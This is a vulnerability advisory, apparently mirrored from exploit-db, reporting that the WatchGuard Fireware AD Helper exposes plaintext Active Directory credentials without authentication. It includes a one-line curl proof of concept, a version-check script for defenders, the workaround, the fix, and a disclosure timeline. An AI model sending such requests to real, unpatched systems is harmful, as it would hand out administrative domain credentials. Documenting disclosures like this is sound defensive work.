WatchGuard Fireware AD Helper Component 5.8.5.10317 – Credential Disclosure

  • Author: RedTeam Pentesting GmbH
    Date: 2020-03-12
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48203/
    # Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
    # Author: RedTeam Pentesting GmbH
    # Date: 2020-03-11
    # Vendor: https://www.watchguard.com
    # Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
    # CVE: N/A
    
    Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component
    
    RedTeam Pentesting discovered a credential-disclosure vulnerability in
    the AD Helper component of the WatchGuard Fireware Threat Detection and
    Response (TDR) service, which allows unauthenticated attackers to gain
    Active Directory credentials for a Windows domain in plaintext.
    
    
    Details
    =======
    
    Product: WatchGuard Fireware AD Helper Component
    Affected Versions: 5.8.5.10233, < 5.8.5.10317
    Fixed Versions: 5.8.5.10317
    Vulnerability Type: Information Disclosure
    Security Risk: high
    Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
    Vendor Status: fixed version released
    Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
    Advisory Status: published
    CVE: GENERIC-MAP-NOMATCH
    CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
    
    
    Introduction
    ============
    
    "Threat Detection and Response (TDR) is a cloud-based subscription
    service that integrates with your Firebox to minimize the consequences
    of data breaches and penetrations through early detection and automated
    remediation of security threats."
    
    "Threat Detection and Response includes the AD Helper component. If your
    network has an Active Directory server, you can install AD Helper to
    manage automated installation and updates of Host Sensors on your
    network."
    
    (from the vendor's homepage)
    
    
    More Details
    ============
    
    By accessing the AD Helper's web interface, it was discovered that the
    interface calls an API endpoint which responds with the plaintext
    credentials for all configured domain controllers. No authentication
    is needed to use the described interface, and the installation
    instructions at [1] contain no indication of any way to configure
    access control.
    
    
    Proof of Concept
    ================
    
    An HTTP GET request to the path "/domains/list" of the AD Helper
    API returns, among other data, the plaintext credentials for
    all configured Windows domain controllers:
    
    ------------------------------------------------------------------------
    $ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
    
    {
      "content": [
        {
          "id": 1,
          "fullyQualifiedName": "example.com",
          "logonDomain": "example.com",
          "domainControllers": "dc1.example.com",
          "username": "[DOMAIN_USER]",
          "password": "[DOMAIN_PASSWORD]",
          "uuid": "[...]",
          "servers": [
            {
              [...]
            }
          ]
        }
      ],
      "totalPages": 1,
      "totalElements": 1,
      "number": 0,
      "numberOfElements": 1
    }
    ------------------------------------------------------------------------
    
    The same request and its response can be observed when initially accessing
    the web interface. The discovered version of AD Helper responds with
    the following server banner:
    
    ------------------------------------------------------------------------
    jetty(winstone-5.8.5.10233-9.4.12.v20180830)
    ------------------------------------------------------------------------
    
    It is likely that other versions of the AD Helper Component are
    vulnerable as well.
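The server banner above identifies the AD Helper build, so an inventory check can flag instances that predate the fixed version 5.8.5.10317 from the Details section. The following Python is an added example, not code from the advisory or from WatchGuard; it assumes the "jetty(winstone-<AD Helper version>-<Jetty version>)" banner format shown above holds for other builds, and the function names and the sample banner list are constructed for illustration.

```python
# Added example (not part of the RedTeam Pentesting advisory): decide from
# the Jetty/Winstone "Server" banner quoted in the advisory whether an
# AD Helper instance predates the fixed version 5.8.5.10317.
import re
from typing import Dict, Iterable, Optional, Tuple

# Version that the advisory lists as fixed.
FIXED_VERSION: Tuple[int, ...] = (5, 8, 5, 10317)

# The advisory shows the banner "jetty(winstone-5.8.5.10233-9.4.12.v20180830)";
# the AD Helper build number is the dotted version right after "winstone-".
# Assumption: other builds use the same banner layout.
BANNER_RE = re.compile(r"winstone-(\d+(?:\.\d+)+)-")


def parse_adhelper_version(banner: str) -> Optional[Tuple[int, ...]]:
    """Extract the AD Helper version from a Server banner, or return None
    if the banner is not in the expected winstone format."""
    match = BANNER_RE.search(banner)
    if match is None:
        return None
    parts = tuple(int(p) for p in match.group(1).split("."))
    # Pad short version strings with zeros so tuples compare component-wise.
    return parts + (0,) * (len(FIXED_VERSION) - len(parts))


def is_pre_fix_version(banner: str) -> Optional[bool]:
    """True if the banner advertises a version older than the fix, False if
    it is the fixed version or newer, None if the banner is not recognised."""
    version = parse_adhelper_version(banner)
    if version is None:
        return None
    return version < FIXED_VERSION


def classify_banners(banners: Iterable[str]) -> Dict[str, Optional[bool]]:
    """Map each banner (e.g. collected from an asset inventory) to a verdict."""
    return {banner: is_pre_fix_version(banner) for banner in banners}


if __name__ == "__main__":
    # Constructed sample inventory: the banner from the advisory, a build
    # at the fixed version, and an unrelated server banner.
    sample = [
        "jetty(winstone-5.8.5.10233-9.4.12.v20180830)",
        "jetty(winstone-5.8.5.10317-9.4.12.v20180830)",
        "nginx/1.18.0",
    ]
    labels = {True: "PRE-FIX (update)", False: "fixed or newer", None: "not AD Helper"}
    for banner, verdict in classify_banners(sample).items():
        print(f"{banner}: {labels[verdict]}")
```

The comparison is component-wise on integer tuples rather than on strings, so 5.8.5.10317 is correctly ordered after 5.8.5.10233, and a banner that does not match the winstone layout yields None instead of a false "fixed" verdict.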
    
    
    Workaround
    ==========
    
    Ensure that the API of the AD Helper Component is not reachable over
    the network, for example by placing it behind a firewall.
    
    
    Fix
    ===
    
    Update to Version 5.8.5.10317 or later.
    
    
    Security Risk
    =============
    
    No authentication is needed to access AD Helper's web interface and the
    installation instructions at [1] describe that configured domain user
    accounts must possess at least the following privileges:
    
     * Connect to the host
     * Mount the share ADMIN$
     * Create a file on the host
     * Execute commands on the host
     * Install software on the host
    
    Access to the "ADMIN$" share implies a user with administrative
    privileges. Therefore, this vulnerability poses a high risk.
    
    
    Timeline
    ========
    
    2020-02-12 Vulnerability identified
    2020-02-19 Customer approved disclosure to vendor
    2020-02-24 Tried to contact the German branch of WatchGuard
    2020-02-27 Contacted the Dutch branch of WatchGuard
    2020-02-28 Contact to ADHelper QA Team Lead established
    2020-03-02 Advisory draft sent for verification
    2020-03-10 Vendor released fixed version and blog post
    2020-03-11 CVE ID requested
    2020-03-11 Advisory released
    
    
    References
    ==========
    
    [1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
    
    
    RedTeam Pentesting GmbH
    =======================
    
    RedTeam Pentesting offers individual penetration tests performed by a
    team of specialised IT-security experts. In this way, security weaknesses
    in company networks or products are uncovered and can be fixed immediately.

    As there are only a few experts in this field, RedTeam Pentesting wants to
    share its knowledge and enhance the public knowledge with research in
    security-related areas. The results are made available as public
    security advisories.
    
    More information about RedTeam Pentesting can be found at:
    https://www.redteam-pentesting.de/